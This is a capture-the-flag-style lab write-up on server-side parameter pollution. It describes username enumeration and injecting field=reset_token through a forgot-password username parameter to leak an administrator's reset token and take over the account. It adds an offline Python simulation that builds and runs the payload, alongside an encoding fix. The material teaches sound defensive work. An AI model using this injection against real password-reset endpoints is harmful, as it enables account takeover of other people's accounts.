Description
To solve the lab, log in as the administrator and delete carlos.
Solution
In this case we don't know any valid credentials, so we first try an obvious guess such as 'administrator' and 'password'. As expected the login fails, so we turn to the forgot password function (/forgot-password) to try to retrieve credentials.
Here we can start the reset procedure for 'administrator', while trying a non-existent account such as 'alex' returns an error saying the account was not found: the endpoint therefore confirms whether a username exists.
The system sends the code/link to change the password to the administrator's e-mail, but the first part of the address is masked in the response.
Analysing the requests in Burp, there is an interesting JavaScript file, /static/js/forgotPassword.js, which contains a function that handles the reset token:
Moving on to the /login page, we check which methods are allowed by sending an OPTIONS request: the method itself is not allowed, but the response reveals that GET and POST are.
Submitting a username that does not exist (alex) and one that does (administrator) gives two different responses:
So we can proceed with Burp Intruder, fuzzing the username parameter (injecting additional parameters through it) and finding that a server-side parameter named field is recognised:
Adding field as a parameter together with a value, we are able to extract the username value:
Doing the same with field=password instead returns a 400 status code:
Remember the JavaScript file: it contains this interesting path in which a resetToken value is inserted:
So, sending a POST request in which field is set to reset_token, we get the corresponding reset token back in the response:
and with GET /forgot-password?reset_token=y8xhpee8hgln52pc9fbj418fu0nxavev
we reach the reset form and can set a new password:
We are now logged in as administrator and, from the Admin panel, can delete the carlos user, solving the lab.
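The steps above (username enumeration, a recognised field parameter reachable through the username value, field=password refused with a 400, field=reset_token leaking the token) are the signature of server-side parameter pollution: the front-end concatenates the user-supplied username into an internal query string without encoding it. The script below is an added example, not part of the original writeup or the lab's code; it simulates such a back-end offline so the mechanism can be run end to end. The internal API, the user store and the token values are constructed, and it assumes the internal parser takes the first occurrence of a repeated parameter, so an injected field= wins over the legitimate one appended after it. The hardened handler shows the one-line fix: encode the value before building the query.

```python
from urllib.parse import parse_qs, quote, urlencode

# Constructed user store: hypothetical accounts and tokens, not the lab's real data.
USERS = {
    "administrator": {
        "email": "admin@normal-user.net",
        "password": "not-retrievable",
        "reset_token": "EXAMPLE_RESET_TOKEN_0123456789abcdef",
    },
    "wiener": {
        "email": "wiener@normal-user.net",
        "password": "peter",
        "reset_token": "EXAMPLE_RESET_TOKEN_fedcba9876543210",
    },
}

# Fields the internal API refuses to return (this models the 400 seen for field=password).
FORBIDDEN_FIELDS = {"password"}


def internal_user_api(query_string: str) -> tuple[int, dict]:
    """Simulated internal /users endpoint returning one field of one user.
    ASSUMPTION: it parses the query string and uses the FIRST occurrence of a
    repeated parameter, so an injected field= wins over the legitimate one."""
    params = parse_qs(query_string, keep_blank_values=True)
    username = params.get("username", [""])[0]
    field = params.get("field", [""])[0]
    user = USERS.get(username)
    if user is None:
        return 200, {"error": "Invalid username"}      # enumeration oracle
    if field in FORBIDDEN_FIELDS:
        return 400, {"error": "Field not permitted"}   # field=password
    if field not in user:
        return 400, {"error": "Invalid field"}
    return 200, {"type": field, "result": user[field]}


def vulnerable_forgot_password(username: str) -> tuple[int, dict]:
    """Front-end handler that builds the internal query by string concatenation.
    `username` is the already-decoded POST parameter, so a literal '&' inside it
    is treated as a separator by the internal API: server-side parameter pollution."""
    query = f"username={username}&field=email"
    return internal_user_api(query)


def hardened_forgot_password(username: str) -> tuple[int, dict]:
    """Same flow with the user-controlled value encoded before concatenation,
    so '&' and '=' stay inside the username value."""
    query = urlencode({"username": username, "field": "email"})
    return internal_user_api(query)


def injected_username(target: str, field: str) -> str:
    """Value to place in the outer form: '&' and '=' percent-encoded once, so the
    front-end's own parser leaves them inside username and the internal API splits them."""
    return quote(f"{target}&field={field}", safe="")


def outer_form_decode(raw_value: str) -> str:
    """What the front-end sees after one round of POST-body decoding."""
    return parse_qs(f"username={raw_value}")["username"][0]


def extract_reset_token(handler, target: str = "administrator"):
    """Run the attack end to end against a forgot-password handler; None on failure."""
    payload = injected_username(target, "reset_token")
    status, body = handler(outer_form_decode(payload))
    if status == 200 and body.get("type") == "reset_token":
        return body["result"]
    return None


if __name__ == "__main__":
    print("vulnerable:", extract_reset_token(vulnerable_forgot_password))
    print("hardened:  ", extract_reset_token(hardened_forgot_password))
```

Against the real target the same payload goes into the username parameter of the POST request seen in Burp; the front-end's masking of the e-mail address never applies to the reset_token field because the back-end was never meant to expose it. The fix in hardened_forgot_password is deliberate encoding of the injected value, which is the same remediation as for any other string-built query.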